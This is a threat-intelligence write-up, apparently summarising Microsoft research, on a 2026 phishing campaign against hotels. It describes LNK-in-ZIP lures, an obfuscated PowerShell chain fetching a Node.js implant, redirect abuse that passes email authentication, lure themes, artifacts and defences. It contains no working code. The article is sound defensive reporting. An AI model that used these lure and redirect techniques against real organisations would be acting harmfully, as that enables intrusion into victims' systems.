Microsoft Threat Intelligence has identified an active, multi-stage intrusion campaign that has targeted organizations in the hospitality and hotel industry since April 2026. Attackers delivered browser-downloaded photo-themed ZIP archives that contained executable shortcut files disguised as images. When opened, these shortcuts kicked off an obfuscated PowerShell chain that fetched a Node.js–based implant, established dual registry persistence, and initiated command-and-control (C2) communications over non-standard ports. Observed post-compromise behaviors include beaconing to C2, forced shutdowns, and on-host compilation of portable executable payloads. While attribution remains unconfirmed, the level of obfuscation and persistence suggests the operator may be preparing infected hosts for further follow-on activity.
What the campaign looked like in the wild
The campaign operated in two distinct waves. Wave 1 used shortcut files named with the pattern IMG-
Observed LNK and ZIP naming patterns across both campaigns.
| LNK file | Source archive | Wave |
|---|---|---|
| IMG-805916584.png.lnk | C:Users[REDACTED]Downloadsphoto-961032103.zip | 1 |
| IMG-421741673.png.lnk | C:Users[REDACTED]Downloadsphoto-818773648.zip | 1 |
| IMG-223099041.png.lnk | C:Users[REDACTED]Downloadsphoto-716449357.zip | 1 |
| IMG-386443483.png.lnk | Browser download | 1 |
| PHOTO-215746435.png.lnk | Browser download | 2 |
Phishing infrastructure and authentication laundering
Starting in late May 2026, the actor abused legitimate services—most notably Calendly’s notification infrastructure and Google redirect functionality—to route phishing links through trusted providers. This multi-hop approach, which Microsoft describes as “authentication laundering,” allowed messages to pass SPF, DKIM, and DMARC checks because the emails were relayed through legitimate sending infrastructure even though the content was attacker-controlled. In practice this makes the phishing messages appear more legitimate to automated email authentication checks and increases the chance that recipients will trust and click the embedded links.
Authentication results for emails sent through the direct Calendly path.
| Authentication Check | Result | Why |
|---|---|---|
| SPF | Pass | Email sent from authorized service |
| DKIM | Pass | Signed by Calendly’s SendGrid sending infrastructure |
| DMARC | Pass | Alignment on calendly.com domain |
| Composite authentication (CompAuth) | Pass | All checks align |
Multi-hop redirect chain and delivery
The phishing emails used a Calendly redirect as the first hop, which forwarded to a Google redirect, and ultimately landed on freshly registered .cfd domains fronted by Cloudflare. Final landing pages were frequently gated behind Cloudflare Turnstile challenges that served to block automated analysis and perform geo-gating prior to delivering the photo-themed ZIP archive. This redirect fragmentation helped obscure the eventual payload location and diluted URL reputation, making detection by automated URL reputation systems more difficult.
Lures, languages, and targeting
The campaign used multilingual, non-personalized lures that broadly referenced guest complaints, bedbug/infestation reports, room inquiries, or verification calls—themes designed to create urgency and reputational concern for hospitality staff. Microsoft observed messages in Japanese, Danish, and Dutch, with Japanese being the most prevalent. The messages were typically generic (no customer or organization names), consistent with a high-volume, list-driven distribution rather than narrowly tailored spear-phishing.
Phishing lure themes by language, listed by observed prevalence.
| Language | Canonical lure (theme) |
|---|---|
| Japanese | Serious guest complaint |
| Japanese | Bedbug complaint, verification call |
| Japanese | Guest stay review request |
| Japanese | Room condition, facility inquiry |
| Japanese | Final warning: infestation, forced inspection |
| Danish | Bedbug complaint, inspection call |
| Danish | Formal complaint, notice of suspension |
| Danish | Health-risk safety alert |
| Dutch | Complaint: possible danger, hospitalization after stay |
Technical attack chain: from shortcut to Node.js implant
- Initial user execution: Victims download a photo-xxxx.zip archive and open what appears to be an image shortcut (.lnk). The shortcut executes code rather than opening an image.
- PowerShell first stage: The LNK invokes obfuscated PowerShell that decodes a BigInt-encoded payload and uses Invoke-WebRequest to fetch a secondary .ps1 script from the campaign’s hosting domains.
- Wave 2 .NET compilation: In later activity, the retrieved .ps1 script triggered csc.exe to compile small .NET DLLs using cvtres.exe, producing small DLL artifacts; these may be preparatory or conditional components in the chain.
- Node.js implant and persistence: The actor deployed a Node.js–based implant that established persistent access via dual registry persistence mechanisms. The implant communicated with C2 over non-standard ports and supported actions such as beaconing, forced shutdowns, and on-host compilation of PE payloads.
- Evasion and obfuscation: The campaign showed repeated obfuscation evolution across multiple phases of the PowerShell stage and used Cloudflare gating and redirect fragmentation to complicate automated analysis.
Representative observed artifacts:
| Artifact | Details |
|---|---|
| PowerShell script | qFWe908J.ps1 ( Size 419 KB) |
| Compiled DLL | bjygtujc.dll Size 3,072 bytes) |
Detection hints and defensive recommendations
Microsoft published Defender detections and community-focused guidance alongside its analysis. Based on the observed techniques, organizations should prioritize the following defensive controls and detection strategies:
- User awareness and phishing-resistant practices: Train reception and front-office staff to treat unexpected image/attachment links with suspicion and verify unusual guest complaints or urgent requests through independent channels.
- Email filtering and URL inspection: Although authentication laundering allows messages to pass SPF/DKIM/DMARC, organizations should apply content and URL reputation checks, multi-layered URL inspection, and heuristics for multi-hop redirects.
- Browser and download restrictions: Limit browser-based downloads to trusted origins and enforce policies that prevent automatic execution of downloaded shortcut files.
- PowerShell and application control: Enable logging and block or constrain PowerShell use where not required. Use application control (e.g., AppLocker, WDAC) to prevent unauthorized execution of scripts and newly compiled binaries.
- Network monitoring: Monitor for unusual outbound connections over non-standard ports and beaconing patterns consistent with C2.
- Endpoint detection: Enable and tune endpoint detection rules to catch obfuscated PowerShell, staged .ps1 retrieval, abnormal csc.exe activity leading to DLLs, and Node.js processes spawning network activity.
- Rapid domain takedown and blocking: Maintain the ability to quickly block and report malicious domains (including short-lived .cfd domains) and use threat intelligence feeds to update protections.
Conclusion
This campaign highlights the continued effectiveness of social-engineering lures tailored to operational workflows and the adversary advantage gained by abusing legitimate infrastructure to bypass authentication checks. Hospitality organizations are particularly exposed because staff routinely exchange images and receive guest-related communications. Combining user training with layered technical controls (email/URL inspection, application control, PowerShell restrictions, and network telemetry) reduces the risk of successful exploitation and helps detect post-compromise activity earlier.
Licensed under CC BY-ND 4.0 International
How a Flippa Purchase Turned 30+ “Essential Plugin” WordPress Plugins into Backdoor Bait
Last week I encountered a supply-chain incident that felt eerily familiar but…
Critical Flaw in User Registration Membership Plugin (CVE-2026-1492) Lets Attackers Bypass WordPress Authentication
A newly disclosed vulnerability in a popular WordPress plugin can allow attackers…
Breaking the code: how a multi-stage “code of conduct” phishing campaign led to AiTM token compromise
Phishing has evolved from crude scams to carefully engineered deceptions that mimic…
Hackers Leverage Microsoft Teams to Breach Organizations: Inside UNC6692’s SNOW Campaign
In late 2025 and into early 2026, a sophisticated intrusion campaign used…